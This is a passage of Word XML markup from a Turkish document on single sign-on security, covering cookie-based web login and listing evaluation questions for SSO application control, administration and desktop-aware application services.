        <w:lastRenderedPageBreak/>
        <w:t>kombinasyonu, harflerin arasına bir harf karışımı, belirli sayıda parola neslinde tekrarlama yapmama, özel karakterlerin yasaklanmış kullanımı (#, $, &amp;,?,%, vb.) ) ve diğer kurallar. SSO, bu fonksiyonu, sistemler ve uygulamalar için amaçlanan tüm arayüzlerde desteklemelidir. Sergi 7.4, SSO'nun çerezleri kullanarak web üzerinden ileri ve geri gönderilen küçük bilgi paketlerini kullanarak Dünya Çapında Ağ (WWW) üzerinden giriş yapmayı nasıl kolaylaştırdığını göstermektedir. Kullanıcı ilk Web sunucusunda oturum açar (1), bu durumda kullanıcının kimlik bilgilerini kimlik bilgileri sunucusundan (2) alan bir aracı etkinleştirir. Bu sunucu, bir isim sunucusuna veya bir LDAP sunucusuna benzer şekilde çalışır, ancak bu cihazın özel olarak yetkilendirme ve erişim ayrıcalıkları bilgisi vermesi dışında. Tanımlama bilgisi daha sonra kullanıcının makinesinde (3) oluşturulur ve saklanır ve bir sayfa geçişi yapıldığında kullanıcıyı yeniden doğrulamak için kullanılır. Bu işlem, bir DBMS içindeki uygulama düzeyinde yetkilerin doğrulanmasına benzer. Veri tabanı sistemi içinde hareket ederken, kullanıcı yeni bir bölgeye veya işleme her eriştiğinde, doğru yetkilendirmeyi sağlamak için erişim ayrıcalıklarının yeniden düzenlenmesi gerekir. Web’deki sayfa geçişleri, DBMS içindeki yeni bölgelere veya işlemlere eşittir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu alanda aşağıdaki hususlar ele alınmalıdır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Platformdan bağımsız olarak tüm uygulamalar müdahaleci bir şekilde desteklenemez mi (yani, kapsamlı ya da hiç değiştirmeden)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Bireysel uygulamaları ayarlamak zorunda kalmadan uygulama başlatma işlemini mekanikleştirmek için ne tür adaptörler mevcuttur? API tabanlı, OLE tabanlı, DDE tabanlı, komut dosyası tabanlı ve oturum uyarlama bağdaştırıcıları mevcut mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Tüm uygulama aktivasyonları ve devre dışı bırakmalar kaydediliyor mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Uygulama şifrelerinin süresi dolduğunda, SSO ürünü otomatik olarak süresi dolan yeni şifreleri oluşturur mu veya kullanıcılar kendi seçimlerini seçip girebilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Bir uygulama etkinleştirildiğinde, bilgi uygulamadaki doğru konuma gitmek için kullanılabilir (örneğin, sipariş girişi uygulaması sipariş girişi ekranına konumlandırılmış)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Uygulama aktivasyon prosedürü son kullanıcıdan gizlenebilir mi yoksa son kullanıcının mekanize işlemi ilerledikçe görmesi gerekiyor mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Bir süre için faaliyet eksikliği olduğunda, bir uygulamayı sonlandırmak için etkinlik dışı kalma zamanlayıcıları var mı?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc9978721"/>
      <w:bookmarkStart w:id="91" w:name="_Toc9979203"/>
      <w:r w:rsidRPr="00C32BE6">
        <w:t>2.15.Uygulama Kontrolü</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Uygulama kontrolü, son kullanıcıların uygulamaları yalnızca belirli bir uygulama içindeki belirli ekranların görülebileceği şekilde sınırlandırır, yalnızca belirli kayıtlar talep edilebilir ve uygulamaların özel kullanımları denetim amacıyla, son nokta uygulamalarına şeffaf bir şekilde kaydedilebilir. dahil olan uygulamalarda herhangi bir değişiklik yapılması gerekmez.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kullanıcı navigasyonunun kontrol edilmesinin bir yolu olarak, bu, kurulumun genel güvenlik duruşunun geliştirilmesine yardımcı olabilecek başka bir özelliktir. Yine, bu bir ek özellik olarak olurdu - anahtar yöntem değil. Bu kabiliyetin kullanışlılığının belirlenmesi aşağıdaki sorularla yapılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Küçük uygulamalar masaüstünün sunum alanına dahil edilebilir mi (örneğin, ana hesapların listesi)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Bir uygulama içindeki doğru konuma gitmek için uygulama bilgileri (örneğin, belirli bir hesap) kullanılabilir mi (örneğin, belirli bir müşteri için bekleyen siparişlerin listesi)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 3. Her uygulamanın görünümü yalnızca belirli bir son kullanıcı için uygun bilgileri gösterecek şekilde ayarlanabilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. SSO ürünü, son kullanıcıların uygulamalardaki etkinliklerini kaydedebilir mi (örneğin, hangi hesaplara erişilmiş)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 5. Uygulama ekranları, uygulamaları kendileri değiştirmek zorunda kalmadan yeni yeteneklerle geliştirilebilir mi (örneğin, yakalanan girdilerin ek doğrulaması)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 6. SSO ürün günlüğü izin verilen alanların ötesine geçen uygulama alanlarına ulaşmaya çalışabilir mi (örneğin, gizli hasta bilgileri)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Son kullanıcıların her bir uygulamayı öğrenme gereksinimini ortadan kaldırmak için birden fazla uygulama tek bir son kullanıcı oturumunda birleştirilebilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. Başvurular bir uygulamadaki (örneğin faturalandırma) son kullanıcı hareketi otomatik olarak alt uygulama oturumlarını (örneğin, mevcut siparişler, alacak hesapları) yeniden konumlandıracak şekilde koordine edilebilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc9978722"/>
      <w:bookmarkStart w:id="93" w:name="_Toc9979204"/>
      <w:r w:rsidRPr="004A15EF">
        <w:t>2.16  Yönetim</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004A15EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A15EF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SSO tarafından sunulan merkezi yönetim yetenekleri - ana cazibe değilse - daha önce bahsedilen “Kutsal Kase” dir. Bir SSO ürünü aracılığıyla kullanıcı hesaplarının ve kaynak yöntemlerinin yönetimi (değiştirilmesi, değiştirilmesi, silinmesi) bir kurum veya kuruluştaki bu işlevi kolaylaştırabilir ve basitleştirebilir. Yönetim araçlarının gücü çok önemlidir, çünkü büyük bir son kullanıcı popülasyonunu yönetmenin maliyeti, SSO ürününün maliyetini kolayca gölgeleyebilir. Ürün analizi aşağıdaki özellikleri dikkate almalıdır: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A15EF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. SSO ürünü tüm uç nokta sistemlerinin merkezi yönetimine izin veriyor mu? (Yani, merkezi yönetim veritabanında yapılan değişiklikler otomatik olarak uç nokta sistemlerine yansıtılır.) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A15EF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Yönetim “son kullanıcı” veya “işletme içindeki bir rol” düzeyinde mi yapılır? (Bu bir son kullanıcı odağı orantısız yönetim çabasıyla sonuçlanabileceği için kritik bir unsurdur.) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A15EF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Her iş istasyonunun ayrı olarak kurulması gerekiyor mu? Öyleyse, tahmini süre nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A15EF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Kuruluştaki son kullanıcıların rolleri kolayca değiştirilebilir mi (karma roller oynayan insanlarla başa çıkmak için)? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A15EF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Son kullanıcının rolleri değiştirilirse, masaüstü otomatik olarak ayarlanıyor mu, yoksa masaüstü görünümünün manuel olarak mı ayarlanması gerekiyor?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A15EF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Bir yönetici, uygulamaya göre etkin son kullanıcıların listesini görebilir mi? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A15EF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Bir yönetici belirli uç nokta uygulamalarına verilen tüm şifrelere erişebilir mi? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A15EF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. Ürün, ağ sunucusu hatalarını incelikle ele alıyor mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc9978723"/>
      <w:bookmarkStart w:id="95" w:name="_Toc9979205"/>
      <w:r w:rsidRPr="00000E7D">
        <w:t>2.17. Masaüstü Duyarlı Uygulamalar için Hizmetler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00000E7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mevcut uç nokta uygulamalarını değiştirmenin mümkün olduğu durumlarda, sorumluluklarını masaüstüyle işbirliği içinde paylaşma kabiliyeti çok çekicidir. Gerekli olan yayınlanmış bir masaüstü API ve ilgili hizmetlerdir. Bu durum, son kullanıcının, sadece onu etkileyecek ve temel uygulamanın kendisini değiştirmeyecek şekilde kendi kullanımına yönelik kurumsal bir üründeki standart bir ürünü kişiselleştirmek istediği durumlarda ortaya çıkabilmektedir. Bu özelleştirme, ekran kullanıcı formatlarını, komut dosyalarını ve bireysel kullanıcının sunucu tarafından sağlanan uygulama ile birlikte kullanmak istediği veya kullanması gereken belirli görevlerle ilgili işlemleri içerebilir. Sağlanan API ile, kullanıcı engellemeden gerekli özel değişiklikleri yapabilir ve bu, diğer kullanıcıların kendilerini veya iş istasyonlarını etkilemeden devam etmelerini sağlar. Bu gibi durumlarda, değişiklikleri isteyen kullanıcı, diğer kullanıcıları kilitlemek için özel erişim ve diğer kontroller gerektirebilir. Bir örnek, değişiklikleri gerektiren kullanıcının hassas veya kısıtlı bilgiler üzerinde çalıştığı ve aynı alandaki diğerlerinin çalışmadığı ve bunlara erişimine izin verilmediği bir örnek olabilir. Bu daha sonra, ek güvenlik gereksinimlerini karşılamak için masaüstünü değiştirmek için kullanılan komut dosyalarına gömülü erişim denetimlerinin kullanılmasını gerektirebilir. Bu durumda, API, SSO'ya erişim olanağı sunmalı ve SSO erişim / ayrıcalık veritabanına doğrudan erişimi olan kullanıcı (yerel değişiklikleri yapan kişi) olmadan erişim / ayrıcalık kontrolünü yapmalıdır. Bu, yerel iş istasyonunun kullanımını izlemek için erişim girişimlerinin, işlemlerin ve veri erişim yetkilerinin kaydedilmesini kolaylaştırmak için de aynı şekilde geçerli olmalıdır. Bu tesisin SSO'daki varlığını belirlemek için, bu hizmetler, API'ler ve aşağıdakiler gibi ilgili yeteneklerle ilgili sorular sorulmalıdır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00000E7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Masaüstünü tanıyan uygulamalar, SSO ürünü tarafından yönetilen son kullanıcı izinlerini sorgulayabilir mi? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00000E7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. Masaüstünü tanıyan uygulamalar, SSO ürününün kayıt olanaklarını kendi kullanımları için kullanabilirler mi? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00000E7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
